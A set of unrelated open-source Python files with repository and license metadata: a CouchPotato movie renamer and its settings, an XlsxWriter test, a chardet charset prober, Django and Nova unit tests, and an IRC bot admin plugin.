replaced = replaced.replace(six.u('<%s>') % toUnicode(x), toUnicode(r))
else:
# If information is not available, we don't want the tag in the filename
replaced = replaced.replace('<' + x + '>', '')
if self.conf('replace_doubles'):
replaced = self.replaceDoubles(replaced.lstrip('. '))
for x, r in replacements.items():
if x in ['thename', 'namethe']:
replaced = replaced.replace(six.u('<%s>') % toUnicode(x), toUnicode(r))
replaced = re.sub(r"[\x00:\*\?\"<>\|]", '', replaced)
sep = self.conf('foldersep') if folder else self.conf('separator')
return ss(replaced.replace(' ', ' ' if not sep else sep))
def replaceDoubles(self, string):
replaces = [
('\.+', '.'), ('_+', '_'), ('-+', '-'), ('\s+', ' '), (' \\\\', '\\\\'), (' /', '/'),
('(\s\.)+', '.'), ('(-\.)+', '.'), ('(\s-)+', '-'),
]
for r in replaces:
reg, replace_with = r
string = re.sub(reg, replace_with, string)
string = string.rstrip(',_-/\\ ')
return string
def checkSnatched(self, fire_scan = True):
if self.checking_snatched:
log.debug('Already checking snatched')
return False
self.checking_snatched = True
try:
db = get_db()
rels = list(fireEvent('release.with_status', ['snatched', 'seeding', 'missing'], single = True))
if not rels:
# No releases found that need status checking
self.checking_snatched = False
return True
# Collect all download information with the download IDs from the releases
download_ids = []
no_status_support = []
try:
for rel in rels:
if not rel.get('download_info'): continue
if rel['download_info'].get('id') and rel['download_info'].get('downloader'):
download_ids.append(rel['download_info'])
ds = rel['download_info'].get('status_support')
if ds is False or ds == 'False':
no_status_support.append(ss(rel['download_info'].get('downloader')))
except:
log.error('Error getting download IDs from database')
self.checking_snatched = False
return False
release_downloads = fireEvent('download.status', download_ids, merge = True) if download_ids else []
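# Ask the active downloaders for the status of every collected download ID; with no results there
# is nothing to reconcile and a plain scan is triggered instead.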
if len(no_status_support) > 0:
log.debug('Download status functionality is not implemented for one of the active downloaders: %s', list(set(no_status_support)))
if not release_downloads:
if fire_scan:
self.scan()
self.checking_snatched = False
return True
scan_releases = []
scan_required = False
log.debug('Checking status snatched releases...')
try:
for rel in rels:
if not rel.get('media_id'): continue
movie_dict = db.get('id', rel.get('media_id'))
download_info = rel.get('download_info')
if not isinstance(download_info, dict):
log.error('Faulty release found without any info, ignoring.')
fireEvent('release.update_status', rel.get('_id'), status = 'ignored', single = True)
continue
# Check if download ID is available
if not download_info.get('id') or not download_info.get('downloader'):
log.debug('Download status functionality is not implemented for downloader (%s) of release %s.', (download_info.get('downloader', 'unknown'), rel['info']['name']))
scan_required = True
# Continue with next release
continue
# Find release in downloaders
nzbname = self.createNzbName(rel['info'], movie_dict)
found_release = False
for release_download in release_downloads:
found_release = False
if download_info.get('id'):
if release_download['id'] == download_info['id'] and release_download['downloader'] == download_info['downloader']:
log.debug('Found release by id: %s', release_download['id'])
found_release = True
break
else:
if release_download['name'] == nzbname or rel['info']['name'] in release_download['name'] or getImdb(release_download['name']) == getIdentifier(movie_dict):
log.debug('Found release by release name or imdb ID: %s', release_download['name'])
found_release = True
break
if not found_release:
log.info('%s not found in downloaders', nzbname)
# If the release was already missing, mark it ignored after more than a week; otherwise set it to missing now
if rel.get('status') == 'missing':
if rel.get('last_edit') < int(time.time()) - 7 * 24 * 60 * 60:
fireEvent('release.update_status', rel.get('_id'), status = 'ignored', single = True)
else:
# Set the release to missing
fireEvent('release.update_status', rel.get('_id'), status = 'missing', single = True)
# Continue with next release
continue
# Log that we found the release
timeleft = 'N/A' if release_download['timeleft'] == -1 else release_download['timeleft']
log.debug('Found %s: %s, time to go: %s', (release_download['name'], release_download['status'].upper(), timeleft))
# Check status of release
if release_download['status'] == 'busy':
# Set the release to snatched if it was missing before
fireEvent('release.update_status', rel.get('_id'), status = 'snatched', single = True)
# Tag folder if it is in the 'from' folder and it will not be processed because it is still downloading
if self.movieInFromFolder(release_download['folder']):
self.tagRelease(release_download = release_download, tag = 'downloading')
elif release_download['status'] == 'seeding':
# If linking setting is enabled, process release
if self.conf('file_action') != 'move' and not rel.get('status') == 'seeding' and self.statusInfoComplete(release_download):
log.info('Download of %s completed! It is now being processed while leaving the original files alone for seeding. Current ratio: %s.', (release_download['name'], release_download['seed_ratio']))
# Remove the downloading tag
self.untagRelease(release_download = release_download, tag = 'downloading')
# Scan and set the torrent to paused if required
release_download.update({'pause': True, 'scan': True, 'process_complete': False})
scan_releases.append(release_download)
else:
# Let it seed
log.debug('%s is seeding with ratio: %s', (release_download['name'], release_download['seed_ratio']))
# Set the release to seeding
fireEvent('release.update_status', rel.get('_id'), status = 'seeding', single = True)
elif release_download['status'] == 'failed':
# Set the release to failed
fireEvent('release.update_status', rel.get('_id'), status = 'failed', single = True)
fireEvent('download.remove_failed', release_download, single = True)
if self.conf('next_on_failed'):
fireEvent('movie.searcher.try_next_release', media_id = rel.get('media_id'))
elif release_download['status'] == 'completed':
log.info('Download of %s completed!', release_download['name'])
# Make sure the downloader sent over a path to look in
if self.statusInfoComplete(release_download):
# If the release has been seeding, process now the seeding is done
if rel.get('status') == 'seeding':
if self.conf('file_action') != 'move':
# Set the release to done as the movie has already been renamed
fireEvent('release.update_status', rel.get('_id'), status = 'downloaded', single = True)
# Allow the downloader to clean-up
release_download.update({'pause': False, 'scan': False, 'process_complete': True})
scan_releases.append(release_download)
else:
# Scan and Allow the downloader to clean-up
release_download.update({'pause': False, 'scan': True, 'process_complete': True})
scan_releases.append(release_download)
else:
# Set the release to snatched if it was missing before
fireEvent('release.update_status', rel.get('_id'), status = 'snatched', single = True)
# Remove the downloading tag
self.untagRelease(release_download = release_download, tag = 'downloading')
# Scan and Allow the downloader to clean-up
release_download.update({'pause': False, 'scan': True, 'process_complete': True})
scan_releases.append(release_download)
else:
scan_required = True
except:
log.error('Failed checking for release in downloader: %s', traceback.format_exc())
# The following can either be done here, or inside the scanner if we pass it scan_items in one go
for release_download in scan_releases:
# Ask the renamer to scan the item
if release_download['scan']:
if release_download['pause'] and self.conf('file_action') == 'link':
fireEvent('download.pause', release_download = release_download, pause = True, single = True)
self.scan(release_download = release_download)
if release_download['pause'] and self.conf('file_action') == 'link':
fireEvent('download.pause', release_download = release_download, pause = False, single = True)
if release_download['process_complete']:
# First make sure the files were successfully processed
if not self.hastagRelease(release_download = release_download, tag = 'failed_rename'):
# Remove the seeding tag if it exists
self.untagRelease(release_download = release_download, tag = 'renamed_already')
# Ask the downloader to process the item
fireEvent('download.process_complete', release_download = release_download, single = True)
if fire_scan and (scan_required or len(no_status_support) > 0):
self.scan()
self.checking_snatched = False
return True
except:
log.error('Failed checking snatched: %s', traceback.format_exc())
self.checking_snatched = False
return False
def extendReleaseDownload(self, release_download):
rls = None
db = get_db()
if release_download and release_download.get('id'):
try:
rls = db.get('release_download', '%s-%s' % (release_download.get('downloader'), release_download.get('id')), with_doc = True)['doc']
except:
log.error('Download ID %s from downloader %s not found in releases', (release_download.get('id'), release_download.get('downloader')))
if rls:
media = db.get('id', rls['media_id'])
release_download.update({
'imdb_id': getIdentifier(media),
'quality': rls['quality'],
'is_3d': rls['is_3d'],
'protocol': rls.get('info', {}).get('protocol') or rls.get('info', {}).get('type'),
'release_id': rls['_id'],
})
return release_download
def downloadIsTorrent(self, release_download):
return release_download and release_download.get('protocol') in ['torrent', 'torrent_magnet']
def fileIsAdded(self, src, group):
if not group or not group.get('before_rename'):
return False
return src in group['before_rename']
def moveTypeIsLinked(self):
return self.conf('default_file_action') in ['copy', 'link']
def statusInfoComplete(self, release_download):
return release_download.get('id') and release_download.get('downloader') and release_download.get('folder')
def movieInFromFolder(self, media_folder):
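# A missing media_folder counts as 'inside the from folder', so tagging still happens for releases without a known folder.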
return media_folder and isSubFolder(media_folder, sp(self.conf('from'))) or not media_folder
def extractFiles(self, folder = None, media_folder = None, files = None, cleanup = False):
if not files: files = []
# RegEx for finding rar files
archive_regex = '(?P<file>^(?P<base>(?:(?!\.part\d+\.rar$).)*)\.(?:(?:part0*1\.)?rar)$)'
restfile_regex = '(^%s\.(?:part(?!0*1\.rar$)\d+\.rar$|[rstuvw]\d+$))'
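# archive_regex matches the first rar volume (.rar or .part01.rar); restfile_regex matches the
# remaining volumes (.partNN.rar or .rNN/.sNN style) belonging to the same base name.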
extr_files = []
from_folder = sp(self.conf('from'))
# Check input variables
if not folder:
folder = from_folder
check_file_date = True
if media_folder:
check_file_date = False
if not files:
for root, folders, names in os.walk(folder):
files.extend([sp(os.path.join(root, name)) for name in names])
# Find all archive files
archives = [re.search(archive_regex, name).groupdict() for name in files if re.search(archive_regex, name)]
# Extract all found archives
for archive in archives:
# Check if it has already been processed by CPS
if self.hastagRelease(release_download = {'folder': os.path.dirname(archive['file']), 'files': archive['file']}):
continue
# Find all related archive files
archive['files'] = [name for name in files if re.search(restfile_regex % re.escape(archive['base']), name)]
archive['files'].append(archive['file'])
# Check if archive is fresh and maybe still copying/moving/downloading, ignore files newer than 1 minute
if check_file_date:
files_too_new, time_string = self.checkFilesChanged(archive['files'])
if files_too_new:
log.info('Archive seems to be still copying/moving/downloading or just copied/moved/downloaded (created on %s), ignoring for now: %s', (time_string, os.path.basename(archive['file'])))
continue
log.info('Archive %s found. Extracting...', os.path.basename(archive['file']))
try:
unrar_path = self.conf('unrar_path')
unrar_path = unrar_path if unrar_path and (os.path.isfile(unrar_path) or re.match('^[a-zA-Z0-9_/\.\-]+$', unrar_path)) else None
rar_handle = RarFile(archive['file'], custom_path = unrar_path)
extr_path = os.path.join(from_folder, os.path.relpath(os.path.dirname(archive['file']), folder))
self.makeDir(extr_path)
for packedinfo in rar_handle.infolist():
extr_file_path = sp(os.path.join(extr_path, os.path.basename(packedinfo.filename)))
if not packedinfo.isdir and not os.path.isfile(extr_file_path):
log.debug('Extracting %s...', packedinfo.filename)
rar_handle.extract(condition = [packedinfo.index], path = extr_path, withSubpath = False, overwrite = False)
if self.conf('unrar_modify_date'):
try:
os.utime(extr_file_path, (os.path.getatime(archive['file']), os.path.getmtime(archive['file'])))
except:
log.error('Rar modify date enabled, but failed: %s', traceback.format_exc())
extr_files.append(extr_file_path)
del rar_handle
except Exception as e:
log.error('Failed to extract %s: %s %s', (archive['file'], e, traceback.format_exc()))
continue
# Delete the archive files
for filename in archive['files']:
if cleanup:
try:
os.remove(filename)
except Exception as e:
log.error('Failed to remove %s: %s %s', (filename, e, traceback.format_exc()))
continue
files.remove(filename)
# Move the rest of the files and folders if any files are extracted to the from folder (only if folder was provided)
if extr_files and folder != from_folder:
for leftoverfile in list(files):
move_to = os.path.join(from_folder, os.path.relpath(leftoverfile, folder))
try:
self.makeDir(os.path.dirname(move_to))
self.moveFile(leftoverfile, move_to, cleanup)
except Exception as e:
log.error('Failed moving left over file %s to %s: %s %s', (leftoverfile, move_to, e, traceback.format_exc()))
# As we probably tried to overwrite the nfo file, check if it exists and then remove the original
if os.path.isfile(move_to) and os.path.getsize(leftoverfile) == os.path.getsize(move_to):
if cleanup:
log.info('Deleting left over file %s instead...', leftoverfile)
os.unlink(leftoverfile)
else:
continue
files.remove(leftoverfile)
extr_files.append(move_to)
if cleanup:
# Remove all left over folders
log.debug('Removing old movie folder %s...', media_folder)
self.deleteEmptyFolder(media_folder)
media_folder = os.path.join(from_folder, os.path.relpath(media_folder, folder))
folder = from_folder
if extr_files:
files.extend(extr_files)
# Cleanup files and folder if media_folder was not provided
if not media_folder:
files = []
folder = None
return folder, media_folder, files, extr_files
rename_options = {
'pre': '<',
'post': '>',
'choices': {
'ext': 'Extension (mkv)',
'namethe': 'Moviename, The',
'thename': 'The Moviename',
'year': 'Year (2011)',
'first': 'First letter (M)',
'quality': 'Quality (720p)',
'quality_type': '(HD) or (SD)',
'3d': '3D',
'3d_type': '3D Type (Full SBS)',
'video': 'Video (x264)',
'audio': 'Audio (DTS)',
'group': 'Releasegroup name',
'source': 'Source media (Bluray)',
'resolution_width': 'resolution width (1280)',
'resolution_height': 'resolution height (720)',
'audio_channels': 'audio channels (7.1)',
'original': 'Original filename',
'original_folder': 'Original foldername',
'imdb_id': 'IMDB id (tt0123456)',
'cd': 'CD number (cd1)',
'cd_nr': 'Just the cd nr. (1)',
'mpaa': 'MPAA or other certification',
'mpaa_only': 'MPAA only certification (G|PG|PG-13|R|NC-17|Not Rated)',
'category': 'Category label',
},
}
config = [{
'name': 'renamer',
'order': 40,
'description': 'Move and rename your downloaded movies to your movie directory.',
'groups': [
{
'tab': 'renamer',
'name': 'renamer',
'label': 'Rename downloaded movies',
'wizard': True,
'options': [
{
'name': 'enabled',
'default': False,
'type': 'enabler',
},
{
'name': 'from',
'type': 'directory',
'description': 'Folder where CP searches for movies.',
},
{
'name': 'to',
'type': 'directory',
'description': 'Default folder where the movies are moved/copied/linked to.',
},
{
'name': 'folder_name',
'label': 'Folder naming',
'description': 'Name of the folder. Keep empty for no folder.',
'default': '<namethe> (<year>)',
'type': 'choice',
'options': rename_options
},
{
'name': 'file_name',
'label': 'File naming',
'description': 'Name of the file',
'default': '<thename><cd>.<ext>',
'type': 'choice',
'options': rename_options
},
{
'advanced': True,
'name': 'replace_doubles',
'type': 'bool',
'label': 'Clean Name',
'description': ('Attempt to clean up double separators due to missing data for fields.', 'Sometimes this eliminates wanted white space (see <a href="https://github.com/RuudBurger/CouchPotatoServer/issues/2782">#2782</a>).'),
'default': True
},
{
'name': 'unrar',
'type': 'bool',
'description': 'Extract rar files if found.',
'default': False,
},
{
'advanced': True,
'name': 'unrar_path',
'description': 'Custom path to unrar bin',
},
{
'advanced': True,
'name': 'unrar_modify_date',
'type': 'bool',
'description': ('Set modify date of unrar-ed files to the rar-file\'s date.', 'This will allow XBMC to recognize extracted files as recently added even if the movie was released some time ago.'),
'default': False,
},
{
'name': 'cleanup',
'type': 'bool',
'description': 'Cleanup leftover files after successful rename.',
'default': False,
},
{
'advanced': True,
'name': 'run_every',
'label': 'Run every',
'default': 1,
'type': 'int',
'unit': 'min(s)',
'description': ('Detect movie status every X minutes.', 'Will start the renamer if the movie is <strong>completed</strong>, or handle a <strong>failed</strong> download if these options are enabled'),
},
{
'advanced': True,
'name': 'force_every',
'label': 'Force every',
'default': 2,
'type': 'int',
'unit': 'hour(s)',
'description': 'Forces the renamer to scan every X hours',
},
{
'advanced': True,
'name': 'next_on_failed',
'default': True,
'type': 'bool',
'description': 'Try the next best release for a movie after a download failed.',
},
{
'name': 'move_leftover',
'type': 'bool',
'description': 'Move all leftover files after renaming to the movie folder.',
'default': False,
'advanced': True,
},
{
'advanced': True,
'name': 'separator',
'label': 'File-Separator',
'description': ('Replace all the spaces with a character.', 'Example: ".", "-" (without quotes). Leave empty to use spaces.'),
},
{
'advanced': True,
'name': 'foldersep',
'label': 'Folder-Separator',
'description': ('Replace all the spaces with a character.', 'Example: ".", "-" (without quotes). Leave empty to use spaces.'),
},
{
'name': 'check_space',
'label': 'Check space',
'default': True,
'type': 'bool',
'description': ('Check if there\'s enough available space to rename the files', 'Disable when the filesystem doesn\'t return the proper value'),
'advanced': True,
},
{
'name': 'default_file_action',
'label': 'Default File Action',
'default': 'move',
'type': 'dropdown',
'values': [('Link', 'link'), ('Copy', 'copy'), ('Move', 'move')],
'description': ('<strong>Link</strong>, <strong>Copy</strong> or <strong>Move</strong> after download completed.',
'Link first tries <a href="http://en.wikipedia.org/wiki/Hard_link">hard link</a>, then <a href="http://en.wikipedia.org/wiki/Sym_link">sym link</a> and falls back to Copy.'),
'advanced': True,
},
{
'name': 'file_action',
'label': 'Torrent File Action',
'default': 'link',
'type': 'dropdown',
'values': [('Link', 'link'), ('Copy', 'copy'), ('Move', 'move')],
'description': 'See above. It is preferred to use link when downloading torrents, as it will save you space while still being able to seed.',
'advanced': True,
},
{
'advanced': True,
'name': 'ntfs_permission',
'label': 'NTFS Permission',
'type': 'bool',
'hidden': os.name != 'nt',
'description': 'Set permission of moved files to that of destination folder (Windows NTFS only).',
'default': False,
},
],
}, {
'tab': 'renamer',
'name': 'meta_renamer',
'label': 'Advanced renaming',
'description': 'Meta data file renaming. Use <filename> to use the above "File naming" settings, without the file extension.',
'advanced': True,
'options': [
{
'name': 'rename_nfo',
'label': 'Rename .NFO',
'description': 'Rename original .nfo file',
'type': 'bool',
'default': True,
},
{
'name': 'nfo_name',
'label': 'NFO naming',
'default': '<filename>.orig.<ext>',
'type': 'choice',
'options': rename_options
},
],
},
],
}]
|
gpl-3.0
|
mdeemer/XlsxWriter
|
xlsxwriter/test/comparison/test_rich_string10.py
|
8
|
1236
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'rich_string10.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
bold = workbook.add_format({'bold': 1})
italic = workbook.add_format({'italic': 1})
worksheet.write('A1', 'Foo', bold)
worksheet.write('A2', 'Bar', italic)
worksheet.write_rich_string('A3', ' a', bold, 'bc', 'defg ')
workbook.close()
self.assertExcelEqual()
|
bsd-2-clause
|
ArthurGarnier/SickRage
|
lib/chardet/sbcsgroupprober.py
|
273
|
3546
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetgroupprober import CharSetGroupProber
from .sbcharsetprober import SingleByteCharSetProber
from .langcyrillicmodel import (Win1251CyrillicModel, Koi8rModel,
Latin5CyrillicModel, MacCyrillicModel,
Ibm866Model, Ibm855Model)
from .langgreekmodel import Latin7GreekModel, Win1253GreekModel
from .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel
# from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel
from .langthaimodel import TIS620ThaiModel
from .langhebrewmodel import Win1255HebrewModel
from .hebrewprober import HebrewProber
from .langturkishmodel import Latin5TurkishModel
class SBCSGroupProber(CharSetGroupProber):
def __init__(self):
super(SBCSGroupProber, self).__init__()
self.probers = [
SingleByteCharSetProber(Win1251CyrillicModel),
SingleByteCharSetProber(Koi8rModel),
SingleByteCharSetProber(Latin5CyrillicModel),
SingleByteCharSetProber(MacCyrillicModel),
SingleByteCharSetProber(Ibm866Model),
SingleByteCharSetProber(Ibm855Model),
SingleByteCharSetProber(Latin7GreekModel),
SingleByteCharSetProber(Win1253GreekModel),
SingleByteCharSetProber(Latin5BulgarianModel),
SingleByteCharSetProber(Win1251BulgarianModel),
# TODO: Restore Hungarian encodings (iso-8859-2 and windows-1250)
# after we retrain model.
# SingleByteCharSetProber(Latin2HungarianModel),
# SingleByteCharSetProber(Win1250HungarianModel),
SingleByteCharSetProber(TIS620ThaiModel),
SingleByteCharSetProber(Latin5TurkishModel),
]
hebrew_prober = HebrewProber()
logical_hebrew_prober = SingleByteCharSetProber(Win1255HebrewModel,
False, hebrew_prober)
visual_hebrew_prober = SingleByteCharSetProber(Win1255HebrewModel, True,
hebrew_prober)
hebrew_prober.set_model_probers(logical_hebrew_prober, visual_hebrew_prober)
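# Hebrew gets special handling: the same windows-1255 model is probed in logical and visual byte order,
# and HebrewProber arbitrates between the two results.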
self.probers.extend([hebrew_prober, logical_hebrew_prober,
visual_hebrew_prober])
self.reset()
|
gpl-3.0
|
ajaali/django
|
tests/bash_completion/tests.py
|
327
|
3888
|
"""
A series of tests to establish that the command-line bash completion works.
"""
import os
import sys
import unittest
from django.apps import apps
from django.core.management import ManagementUtility
from django.test.utils import captured_stdout
class BashCompletionTests(unittest.TestCase):
"""
Testing the Python level bash completion code.
This requires setting up the environment as if we got passed data
from bash.
"""
def setUp(self):
self.old_DJANGO_AUTO_COMPLETE = os.environ.get('DJANGO_AUTO_COMPLETE')
os.environ['DJANGO_AUTO_COMPLETE'] = '1'
def tearDown(self):
if self.old_DJANGO_AUTO_COMPLETE:
os.environ['DJANGO_AUTO_COMPLETE'] = self.old_DJANGO_AUTO_COMPLETE
else:
del os.environ['DJANGO_AUTO_COMPLETE']
def _user_input(self, input_str):
"""
Set the environment and the list of command line arguments.
This sets the bash variables $COMP_WORDS and $COMP_CWORD. The former is
an array consisting of the individual words in the current command
line, the latter is the index of the current cursor position, so in
case a word is completed and the cursor is placed after a whitespace,
$COMP_CWORD must be incremented by 1:
* 'django-admin start' -> COMP_CWORD=1
* 'django-admin startproject' -> COMP_CWORD=1
* 'django-admin startproject ' -> COMP_CWORD=2
"""
os.environ['COMP_WORDS'] = input_str
idx = len(input_str.split(' ')) - 1 # Index of the last word
comp_cword = idx + 1 if input_str.endswith(' ') else idx
os.environ['COMP_CWORD'] = str(comp_cword)
sys.argv = input_str.split()
def _run_autocomplete(self):
util = ManagementUtility(argv=sys.argv)
with captured_stdout() as stdout:
try:
util.autocomplete()
except SystemExit:
pass
return stdout.getvalue().strip().split('\n')
def test_django_admin_py(self):
"django_admin.py will autocomplete option flags"
self._user_input('django-admin sqlmigrate --verb')
output = self._run_autocomplete()
self.assertEqual(output, ['--verbosity='])
def test_manage_py(self):
"manage.py will autocomplete option flags"
self._user_input('manage.py sqlmigrate --verb')
output = self._run_autocomplete()
self.assertEqual(output, ['--verbosity='])
def test_custom_command(self):
"A custom command can autocomplete option flags"
self._user_input('django-admin test_command --l')
output = self._run_autocomplete()
self.assertEqual(output, ['--list'])
def test_subcommands(self):
"Subcommands can be autocompleted"
self._user_input('django-admin sql')
output = self._run_autocomplete()
self.assertEqual(output, ['sqlflush sqlmigrate sqlsequencereset'])
def test_completed_subcommand(self):
"Show option flags in case a subcommand is completed"
self._user_input('django-admin startproject ') # Trailing whitespace
output = self._run_autocomplete()
for item in output:
self.assertTrue(item.startswith('--'))
def test_help(self):
"No errors, just an empty list if there are no autocomplete options"
self._user_input('django-admin help --')
output = self._run_autocomplete()
self.assertEqual(output, [''])
def test_app_completion(self):
"Application names will be autocompleted for an AppCommand"
self._user_input('django-admin sqlmigrate a')
output = self._run_autocomplete()
a_labels = sorted(app_config.label
for app_config in apps.get_app_configs()
if app_config.label.startswith('a'))
self.assertEqual(output, a_labels)
|
bsd-3-clause
|
sajeeshcs/nested_quota_latest
|
nova/tests/unit/compute/test_hvtype.py
|
11
|
1617
|
# Copyright (C) 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.compute import hv_type
from nova import exception
from nova import test
class HvTypeTest(test.NoDBTestCase):
def test_valid_string(self):
self.assertTrue(hv_type.is_valid("vmware"))
def test_valid_constant(self):
self.assertTrue(hv_type.is_valid(hv_type.QEMU))
def test_valid_bogus(self):
self.assertFalse(hv_type.is_valid("acmehypervisor"))
def test_canonicalize_none(self):
self.assertIsNone(hv_type.canonicalize(None))
def test_canonicalize_case(self):
self.assertEqual(hv_type.QEMU, hv_type.canonicalize("QeMu"))
def test_canonicalize_xapi(self):
self.assertEqual(hv_type.XEN, hv_type.canonicalize("xapi"))
def test_canonicalize_powervm(self):
self.assertEqual(hv_type.PHYP, hv_type.canonicalize("POWERVM"))
def test_canonicalize_invalid(self):
self.assertRaises(exception.InvalidHypervisorVirtType,
hv_type.canonicalize,
"wibble")
|
apache-2.0
|
allanice001/RJ45
|
plugins/admin.py
|
1
|
6874
|
from util import hook
import os
import re
import json
import time
import subprocess
@hook.command(autohelp=False, permissions=["permissions_users"])
def permissions(inp, bot=None, notice=None):
"permissions [group] -- lists the users and their permission level who have permissions."
permissions = bot.config.get("permissions", [])
groups = []
if inp:
for k in permissions:
if inp == k:
groups.append(k)
else:
for k in permissions:
groups.append(k)
if not groups:
notice("%s is not a group with permissions" % inp)
return None
for v in groups:
members = ""
for value in permissions[v]["users"]:
members = members + value + ", "
if members:
notice("the members in the %s group are.." % v)
notice(members[:-2])
else:
notice("there are no members in the %s group" % v)
@hook.command(permissions=["permissions_users"])
def deluser(inp, bot=None, notice=None):
"deluser [user] [group] -- removes elevated permissions from [user]. " \
"If [group] is specified, they will only be removed from [group]."
permissions = bot.config.get("permissions", [])
inp = inp.split(" ")
groups = []
try:
specgroup = inp[1]
except IndexError:
specgroup = None
for k in permissions:
groups.append(k)
else:
for k in permissions:
if specgroup == k:
groups.append(k)
if not groups:
notice("%s is not a group with permissions" % inp[1])
return None
removed = 0
for v in groups:
users = permissions[v]["users"]
for value in users:
if inp[0] == value:
users.remove(inp[0])
removed = 1
notice("%s has been removed from the group %s" % (inp[0], v))
json.dump(bot.config, open('config', 'w'), sort_keys=True, indent=2)
if specgroup:
if removed == 0:
notice("%s is not in the group %s" % (inp[0], specgroup))
else:
if removed == 0:
notice("%s is not in any groups" % inp[0])
@hook.command(permissions=["permissions_users"])
def adduser(inp, bot=None, notice=None):
"adduser [user] [group] -- adds elevated permissions to [user]. " \
"[group] must be specified."
permissions = bot.config.get("permissions", [])
inp = inp.split(" ")
try:
user = inp[0]
targetgroup = inp[1]
except IndexError:
notice("the group must be specified")
return None
if not re.search('.+!.+@.+', user):
notice("the user must be in the form of \"nick!user@host\"")
return None
try:
users = permissions[targetgroup]["users"]
except KeyError:
notice("no such group as %s" % targetgroup)
return None
if user in users:
notice("%s is already in %s" % (user, targetgroup))
return None
users.append(user)
notice("%s has been added to the group %s" % (user, targetgroup))
users.sort()
json.dump(bot.config, open('config', 'w'), sort_keys=True, indent=2)
@hook.command("quit", autohelp=False, permissions=["botcontrol"])
@hook.command(autohelp=False, permissions=["botcontrol"])
def stop(inp, nick=None, conn=None):
"stop [reason] -- Kills the bot with [reason] as its quit message."
if inp:
conn.cmd("QUIT", ["Killed by %s (%s)" % (nick, inp)])
else:
conn.cmd("QUIT", ["Killed by %s." % nick])
time.sleep(5)
os.execl("./cloudbot", "cloudbot", "stop")
@hook.command(autohelp=False, permissions=["botcontrol"])
def restart(inp, nick=None, conn=None):
"restart [reason] -- Restarts the bot with [reason] as its quit message."
if inp:
conn.cmd("QUIT", ["Restarted by %s (%s)" % (nick, inp)])
else:
conn.cmd("QUIT", ["Restarted by %s." % nick])
time.sleep(5)
os.execl("./cloudbot", "cloudbot", "restart")
@hook.command(autohelp=False, permissions=["botcontrol"])
def clearlogs(inp, input=None):
"clearlogs -- Clears the bots log(s)."
subprocess.call(["./cloudbot", "clear"])
@hook.command(permissions=["botcontrol"])
def join(inp, conn=None, notice=None):
"join <channel> -- Joins <channel>."
notice("Attempting to join %s..." % inp)
conn.join(inp)
@hook.command(autohelp=False, permissions=["botcontrol"])
def part(inp, conn=None, chan=None, notice=None):
"part <channel> -- Leaves <channel>." \
"If [channel] is blank the bot will leave the " \
"channel the command was used in."
if inp:
target = inp
else:
target = chan
notice("Attempting to leave %s..." % target)
conn.part(target)
@hook.command(autohelp=False, permissions=["botcontrol"])
def cycle(inp, conn=None, chan=None, notice=None):
"cycle <channel> -- Cycles <channel>." \
"If [channel] is blank the bot will cycle the " \
"channel the command was used in."
if inp:
target = inp
else:
target = chan
notice("Attempting to cycle %s..." % target)
conn.part(target)
conn.join(target)
@hook.command(permissions=["botcontrol"])
def nick(inp, input=None, notice=None, conn=None):
"nick <nick> -- Changes the bots nickname to <nick>."
if not re.match("^[A-Za-z0-9_|.-\]\[]*$", inp.lower()):
notice("Invalid username!")
return
notice("Attempting to change nick to \"%s\"..." % inp)
conn.set_nick(inp)
@hook.command(permissions=["botcontrol"])
def raw(inp, conn=None, notice=None):
"raw <command> -- Sends a RAW IRC command."
notice("Raw command sent.")
conn.send(inp)
@hook.command(permissions=["botcontrol"])
def say(inp, conn=None, chan=None, notice=None):
"say [channel] <message> -- Makes the bot say <message> in [channel]. " \
"If [channel] is blank the bot will say the <message> in the channel " \
"the command was used in."
inp = inp.split(" ")
if inp[0][0] == "#":
message = ""
for x in inp[1:]:
message = message + x + " "
message = message[:-1]
out = "PRIVMSG %s :%s" % (inp[0], message)
else:
message = ""
for x in inp[0:]:
message = message + x + " "
message = message[:-1]
out = "PRIVMSG %s :%s" % (chan, message)
conn.send(out)
@hook.command("act", permissions=["botcontrol"])
@hook.command(permissions=["botcontrol"])
def me(inp, conn=None, chan=None, notice=None):
"me [channel] <action> -- Makes the bot act out <action> in [channel]. " \
"If [channel] is blank the bot will act the <action> in the channel the " \
"command was used in."
inp = inp.split(" ")
if inp[0][0] == "#":
message = ""
for x in inp[1:]:
message = message + x + " "
message = message[:-1]
out = "PRIVMSG %s :\x01ACTION %s\x01" % (inp[0], message)
else:
message = ""
for x in inp[0:]:
message = message + x + " "
message = message[:-1]
out = "PRIVMSG %s :\x01ACTION %s\x01" % (chan, message)
conn.send(out)
